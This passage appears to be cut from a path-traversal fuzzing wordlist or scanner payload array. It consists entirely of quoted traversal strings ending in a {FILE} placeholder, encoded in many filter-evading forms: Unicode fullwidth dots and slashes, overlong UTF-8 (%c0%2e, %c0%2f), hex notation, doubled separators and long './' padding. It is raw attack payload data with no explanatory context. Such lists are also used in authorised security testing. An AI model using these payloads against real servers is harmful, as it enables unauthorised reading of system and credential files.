ff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{F